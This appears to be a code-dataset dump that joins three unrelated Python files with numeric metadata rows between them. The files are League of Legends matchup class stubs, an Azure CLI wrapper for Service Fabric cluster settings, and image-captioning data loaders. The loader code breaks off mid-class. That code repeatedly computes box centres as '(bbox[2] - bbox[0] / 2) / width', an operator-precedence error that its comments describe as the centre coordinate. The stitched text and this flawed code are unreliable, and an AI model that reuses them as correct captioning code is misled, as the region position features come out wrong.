class NA_Akali_Top_Morgana(Ratings):
pass
class NA_Akali_Top_Nami(Ratings):
pass
class NA_Akali_Top_Nasus(Ratings):
pass
class NA_Akali_Top_Nautilus(Ratings):
pass
class NA_Akali_Top_Nidalee(Ratings):
pass
class NA_Akali_Top_Nocturne(Ratings):
pass
class NA_Akali_Top_Nunu(Ratings):
pass
class NA_Akali_Top_Olaf(Ratings):
pass
class NA_Akali_Top_Orianna(Ratings):
pass
class NA_Akali_Top_Ornn(Ratings):
pass
class NA_Akali_Top_Pantheon(Ratings):
pass
class NA_Akali_Top_Poppy(Ratings):
pass
class NA_Akali_Top_Quinn(Ratings):
pass
class NA_Akali_Top_Rakan(Ratings):
pass
class NA_Akali_Top_Rammus(Ratings):
pass
class NA_Akali_Top_RekSai(Ratings):
pass
class NA_Akali_Top_Renekton(Ratings):
pass
class NA_Akali_Top_Rengar(Ratings):
pass
class NA_Akali_Top_Riven(Ratings):
pass
class NA_Akali_Top_Rumble(Ratings):
pass
class NA_Akali_Top_Ryze(Ratings):
pass
class NA_Akali_Top_Sejuani(Ratings):
pass
class NA_Akali_Top_Shaco(Ratings):
pass
class NA_Akali_Top_Shen(Ratings):
pass
class NA_Akali_Top_Shyvana(Ratings):
pass
class NA_Akali_Top_Singed(Ratings):
pass
class NA_Akali_Top_Sion(Ratings):
pass
class NA_Akali_Top_Sivir(Ratings):
pass
class NA_Akali_Top_Skarner(Ratings):
pass
class NA_Akali_Top_Sona(Ratings):
pass
class NA_Akali_Top_Soraka(Ratings):
pass
class NA_Akali_Top_Swain(Ratings):
pass
class NA_Akali_Top_Syndra(Ratings):
pass
class NA_Akali_Top_TahmKench(Ratings):
pass
class NA_Akali_Top_Taliyah(Ratings):
pass
class NA_Akali_Top_Talon(Ratings):
pass
class NA_Akali_Top_Taric(Ratings):
pass
class NA_Akali_Top_Teemo(Ratings):
pass
class NA_Akali_Top_Thresh(Ratings):
pass
class NA_Akali_Top_Tristana(Ratings):
pass
class NA_Akali_Top_Trundle(Ratings):
pass
class NA_Akali_Top_Tryndamere(Ratings):
pass
class NA_Akali_Top_TwistedFate(Ratings):
pass
class NA_Akali_Top_Twitch(Ratings):
pass
class NA_Akali_Top_Udyr(Ratings):
pass
class NA_Akali_Top_Urgot(Ratings):
pass
class NA_Akali_Top_Varus(Ratings):
pass
class NA_Akali_Top_Vayne(Ratings):
pass
class NA_Akali_Top_Veigar(Ratings):
pass
class NA_Akali_Top_Velkoz(Ratings):
pass
class NA_Akali_Top_Vi(Ratings):
pass
class NA_Akali_Top_Viktor(Ratings):
pass
class NA_Akali_Top_Vladimir(Ratings):
pass
class NA_Akali_Top_Volibear(Ratings):
pass
class NA_Akali_Top_Warwick(Ratings):
pass
class NA_Akali_Top_Xayah(Ratings):
pass
class NA_Akali_Top_Xerath(Ratings):
pass
class NA_Akali_Top_XinZhao(Ratings):
pass
class NA_Akali_Top_Yasuo(Ratings):
pass
class NA_Akali_Top_Yorick(Ratings):
pass
class NA_Akali_Top_Zac(Ratings):
pass
class NA_Akali_Top_Zed(Ratings):
pass
class NA_Akali_Top_Ziggs(Ratings):
pass
class NA_Akali_Top_Zilean(Ratings):
pass
class NA_Akali_Top_Zyra(Ratings):
pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
229f53030cb19ea28beec6329667d38e0b30fe6e
| 1,747
|
py
|
Python
|
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/sf/cluster/setting/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage a cluster's settings.
'''
from .... pyaz_utils import _call_az
def set(cluster_name, resource_group, parameter=None, section=None, settings_section_description=None, value=None):
'''
Update the settings of a cluster.
Required Parameters:
- cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- parameter -- parameter name
- section -- section name
- settings_section_description -- JSON encoded parameters configuration. Use @{file} to load from a file. For example: [{"section": "NamingService","parameter": "MaxOperationTimeout","value": 1000},{"section": "MaxFileOperationTimeout","parameter": "Max2","value": 1000]
- value -- Specify the value
'''
return _call_az("az sf cluster setting set", locals())
def remove(cluster_name, resource_group, parameter=None, section=None, settings_section_description=None):
'''
Remove settings from a cluster.
Required Parameters:
- cluster_name -- Specify the name of the cluster, if not given it will be same as resource group name
- resource_group -- Specify the resource group name. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- parameter -- parameter name
- section -- section name
- settings_section_description -- JSON encoded parameters configuration. Use @{file} to load from a file. For example: [{"section": "NamingService","parameter": "MaxOperationTimeout"}]
'''
return _call_az("az sf cluster setting remove", locals())
| 45.973684
| 274
| 0.721236
| 218
| 1,747
| 5.674312
| 0.279817
| 0.084074
| 0.054972
| 0.038804
| 0.829426
| 0.829426
| 0.829426
| 0.780922
| 0.780922
| 0.780922
| 0
| 0.00625
| 0.17573
| 1,747
| 37
| 275
| 47.216216
| 0.852778
| 0.71723
| 0
| 0
| 0
| 0
| 0.134177
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
22c939223b59e9c8df4e573ff3fd5354ed6af3ec
| 65,710
|
py
|
Python
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 32
|
2021-03-01T07:02:52.000Z
|
2022-03-30T02:38:35.000Z
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 6
|
2021-04-14T12:20:16.000Z
|
2022-03-11T11:21:36.000Z
|
data/field.py
|
yourfatherI/VSR-guided-CIC
|
6d02fbac38ac10635fb62fff965d5ae8dd3174ad
|
[
"BSD-3-Clause"
] | 3
|
2021-08-17T13:18:08.000Z
|
2022-02-10T08:15:28.000Z
|
import os
import warnings
import shutil
import numpy as np
import h5py
import pickle as pkl
import warnings
import json
import random
import torch
from itertools import groupby
from speaksee.data import RawField
class COCOControlSequenceField(RawField):
def __init__(self, postprocessing=None, detections_path=None, classes_path=None,
padding_idx=0, fix_length=None, all_boxes=True, pad_init=True, pad_eos=True, dtype=torch.float32,
max_detections=20, max_length=100, sorting=False):
self.max_detections = max_detections
self.max_length = max_length
self.detections_path = detections_path
self.padding_idx = padding_idx
self.fix_length = fix_length
self.all_boxes = all_boxes
self.sorting = sorting
self.eos_token = padding_idx if pad_eos else None
self.dtype = dtype
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
super(COCOControlSequenceField, self).__init__(None, postprocessing)
def get_detections_inside(self, det_boxes, query):
cond1 = det_boxes[:, 0] >= det_boxes[query, 0]
cond2 = det_boxes[:, 1] >= det_boxes[query, 1]
cond3 = det_boxes[:, 2] <= det_boxes[query, 2]
cond4 = det_boxes[:, 3] <= det_boxes[query, 3]
cond = cond1 & cond2 & cond3 & cond4
return np.nonzero(cond)[0]
def _fill(self, cls_seq, det_features, det_boxes, selected_classes, most_probable_dets, max_len):
det_sequences = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
for j, cls in enumerate(cls_seq[:max_len]):
if cls == '_':
det_sequences[j, :det_features.shape[0]] = most_probable_dets
else:
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls]
if self.all_boxes:
det_ids = np.unique(np.concatenate([self.get_detections_inside(det_boxes, d) for d in seed_detections]))
else:
det_ids = np.unique(seed_detections)
det_sequences[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections]
if not self.sorting:
last = len(cls_seq[:max_len])
det_sequences[last:] = det_sequences[last-1]
return det_sequences.astype(np.float32)
def preprocess(self, x):
image = x[0][0]
det_classes = x[1]
max_len = self.fix_length + (self.eos_token, self.eos_token).count(None) - 2
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
most_probable_idxs = np.argsort(np.max(det_cls_probs, -1))[::-1][:self.max_detections] # 按概率从大到小的max_detections个
most_probable_dets = det_features[most_probable_idxs]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:])+1] for i in range(len(det_cls_probs))]
cls_seq = []
for i, cls in enumerate(det_classes):
if cls is not None:
cls_seq.append(cls)
else:
cls_ok = next((c for c in det_classes[i+1:] if c is not None), '_')
cls_seq.append(cls_ok)
cls_seq_gt = np.asarray([int(a != b) for (a, b) in zip(cls_seq[:-1], cls_seq[1:])] + [0, ])
cls_seq_gt = cls_seq_gt[:max_len]
cls_seq_gt = np.concatenate([cls_seq_gt, [self.eos_token, self.eos_token]])
cls_seq_gt = np.concatenate([cls_seq_gt, [self.padding_idx]*max(0, self.fix_length - len(cls_seq_gt))])
cls_seq_gt = cls_seq_gt.astype(np.float32)
cls_seq_test = [x[0] for x in groupby(det_classes) if x[0] is not None]
if self.sorting:
cls_seq_test.sort()
det_sequences_test = self._fill(cls_seq_test, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
return det_sequences_test
else:
det_sequences = self._fill(cls_seq, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
det_sequences_test = self._fill(cls_seq_test, det_features, det_boxes, selected_classes, most_probable_dets, max_len)
cls_seq_test = ' '.join(cls_seq_test)
return det_sequences, cls_seq_gt, det_sequences_test, cls_seq_test # , id_image
# MSCOCO
class ImageDetectionsField(RawField):
def __init__(self, preprocessing=None, postprocessing=None, detections_path=None, max_detections=100,
sort_by_prob=False, load_in_tmp=True):
self.max_detections = max_detections
self.detections_path = detections_path
self.sort_by_prob = sort_by_prob
tmp_detections_path = os.path.join('/tmp', os.path.basename(detections_path))
if not os.path.isfile(tmp_detections_path):
if shutil.disk_usage("/tmp")[-1] < os.path.getsize(detections_path):
warnings.warn('Loading from %s, because /tmp has no enough space.' % detections_path)
elif load_in_tmp:
warnings.warn("Copying detection file to /tmp")
shutil.copyfile(detections_path, tmp_detections_path)
self.detections_path = tmp_detections_path
warnings.warn("Done.")
else:
self.detections_path = tmp_detections_path
super(ImageDetectionsField, self).__init__(preprocessing, postprocessing)
def preprocess(self, x, avoid_precomp=False):
image_id = int(x.split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
precomp_data = f['%d_features' % image_id][()]
if self.sort_by_prob:
precomp_data = precomp_data[np.argsort(np.max(f['%d_cls_prob' % image_id][()], -1))[::-1]]
except KeyError:
warnings.warn('Could not find detections for %d' % image_id)
precomp_data = np.random.rand(10,2048)
delta = self.max_detections - precomp_data.shape[0]
if delta > 0:
precomp_data = np.concatenate([precomp_data, np.zeros((delta, precomp_data.shape[1]))], axis=0)
elif delta < 0:
precomp_data = precomp_data[:self.max_detections]
return precomp_data.astype(np.float32), image_id
# MSCOCO detection field
class COCOControlSetField(RawField):
def __init__(self, postprocessing=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, verb_idx_path=None, idx_vs_path=None, cap_classes_path=None,
cap_verb_path=None, detections_path=None, fix_length=20, max_detections=20):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(idx_vs_path, 'r') as fp:
self.idx_2_vs = json.load(fp)
with open(cap_classes_path, 'r') as fp:
self.cap_2_classes = json.load(fp)
with open(cap_verb_path, 'r') as fp:
self.cap_2_verb = json.load(fp)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is for predict END of the output
super(COCOControlSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[str(id_image)][caption]['verb']
idx_2_sr = self.idx_2_vs[str(id_image)][caption]['sr']
cap_2_verb = self.cap_2_verb[str(id_image)][caption]
cls_seq = self.cap_2_classes[str(id_image)][caption]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# why set as 8?
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
# why set as 8?
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0代表没有verb
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
for j, cls in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if k == 8:
break
gt_det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
gt_det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[j][k]] + 1 # 0代表pad
idx_list_ = np.array(cls_seq).argsort()
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
cls_seq.sort() # 按字母序排列class, 相当于打乱排序,shuffle sequence
for j, cls in enumerate(cls_seq):
cls_w = cls.split(',')[0].split(' ')[-1] # 当前class,为啥这么处理?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # 从detections里面找到class是选中class的detections序号
det_ids = np.unique(seed_detections)
# 当前class所有region的feature
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections]
det_sequences_visual[j] = det_features[det_ids[0]] # 当前class第一个region的feature
bbox = det_boxes[det_ids[0]] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][k]] + 1 # 0代表pad
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list
class COCODetSetField(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, cls_seq_path=None, fix_length=20, max_detections=20):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(cls_seq_path, 'r') as f:
self.img_cap_v_2_class = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25} # END is for predict END of the output
super(COCODetSetField, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_class[str(id_image)][caption]
classes_seq = []
loc_2_verb = {}
loc_2_sr = {}
loc = 0
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for class_idx in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
classes_seq.append(class_idx)
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(sr)
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0代表没有verb
cls_seq = [self.classes[class_idx] for class_idx in classes_seq]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class从1开始,0可能表示没有关系
width, height = self.img_shapes[str(id_image)]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
idx_list_ = np.array(cls_seq).argsort()
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
cls_seq.sort() # 按字母序排列class, 相当于打乱排序
for j, cls in enumerate(cls_seq):
cls_w = cls.split(',')[0].split(' ')[-1] # 当前class,为啥这么处理?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # 从detections里面找到class是选中class的detections序号
det_ids = np.unique(seed_detections)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # 当前class所有region的feature
det_sequences_visual[j] = det_features[det_ids[0]] # 当前class第一个region的feature
bbox = det_boxes[det_ids[0]] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
for k, sr in enumerate(loc_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
det_sequences_verb[j, k] = self.verb_2_idx[loc_2_verb[int(idx_list[j][0])][k]] + 1 # 0代表pad
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), idx_list
class COCOControlSetField_Verb(RawField):
def __init__(self, postprocessing=None, idx_vs_path=None, cap_classes_path=None, cap_verb_path=None,
verb_idx_path=None, detections_path=None, classes_path=None, img_shapes_path=None,
precomp_glove_path=None, vocab_path=None, idx_2_verb_og_path=None, verb_vob_path=None,
fix_length=20, max_detections=20, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(cap_classes_path, 'r') as fp:
self.cap_2_classes = json.load(fp)
with open(idx_vs_path, 'r') as fp:
self.idx_2_vs = json.load(fp)
with open(verb_idx_path, 'r') as fp:
self.verb_2_idx = json.load(fp)
with open(cap_verb_path, 'r') as fp:
self.cap_2_verb = json.load(fp)
with open(vocab_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
with open(idx_2_verb_og_path) as f:
self.idx_2_v_og = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(COCOControlSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
id_image = int(image.split('/')[-1].split('_')[-1].split('.')[0])
try:
f = h5py.File(self.detections_path, 'r')
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_boxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %d' % id_image)
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_boxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[str(id_image)][caption]['verb']
idx_2_sr = self.idx_2_vs[str(id_image)][caption]['sr']
idx_2_v_og = self.idx_2_v_og[str(id_image)][caption]
cap_2_verb = self.cap_2_verb[str(id_image)][caption]
cls_seq = self.cap_2_classes[str(id_image)][caption]
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))] # class从1开始,0可能表示没有关系
width, height = self.img_shapes[str(id_image)]
# pooled_feat
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
# 不是verb的位置为0,是verb的位置为verb的index
verb_list = np.zeros((self.fix_length, 1))
verb_list[verb_list==0] = -1
verb_list_og = np.zeros((self.fix_length, 1))
verb_list_og[verb_list_og==0] = -1
idx_list = np.zeros((self.fix_length, 1))
idx_list[idx_list==0] = -1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
control_verb[j] = self.verb_2_idx[verb] + 1 # 0代表没有verb
cls_seq = cls_seq[:self.fix_length] # 只保留前10个
for j, cls in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if k >= 8:
continue
gt_det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
gt_det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[j][k]] + 1 # 0代表pad
# 随机排序
idx_rank = [x for x in range(self.fix_length)]
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if cls == '_':
continue
if cls != 'verb': # class为verb不用feature排序
cls_w = cls.split(',')[0].split(' ')[-1] # 当前class,为啥这么处理?
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
seed_detections = [i for i, c in enumerate(selected_classes) if c == cls] # 从detections里面找到class是选中class的detections序号
det_ids = np.unique(seed_detections)
det_sequences_visual_all[j, :len(det_ids)] = np.take(det_features, det_ids, axis=0)[:self.max_detections] # 当前class所有region的feature
det_sequences_visual[j] = det_features[det_ids[0]] # 当前class第一个region的feature
bbox = det_boxes[det_ids[0]] # 当前class第一个region的框 (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[2] - bbox[0] / 2) / width # 中心横坐标
det_sequences_position[j, 1] = (bbox[3] - bbox[1] / 2) / height # 中心纵坐标
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width # 宽
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height # 长
else:
det_sequences_visual_all[j, 0] = pooled_feat
# 后面这串是verb_idx
if idx_2_verb[int(idx_list[j][0])] != []:
if idx_2_v_og[int(idx_list[j][0])][0] in self.vocab_2_idx:
verb_list_og[j, :] = self.vocab_2_idx[idx_2_v_og[int(idx_list[j][0])][0]]
else:
verb_list_og[j, :] = 0
verb_list[j, :] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][0]] + 1
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if k >= 8:
continue
det_sequences_sr[j, k] = self.sr_2_idx[sr.split('-')[-1]] # 0代表pad
det_sequences_verb[j, k] = self.verb_2_idx[idx_2_verb[int(idx_list[j][0])][k]] + 1 # 0代表pad
if self.gt_verb:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
class COCODetSetField_Verb(RawField):
def __init__(self, postprocessing=None, cls_seq_path=None, vocab_path=None,
vlem_2_v_og_path=None, verb_idx_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, fix_length=20, max_detections=20,
gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for object in f.readlines():
self.classes.append(object.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
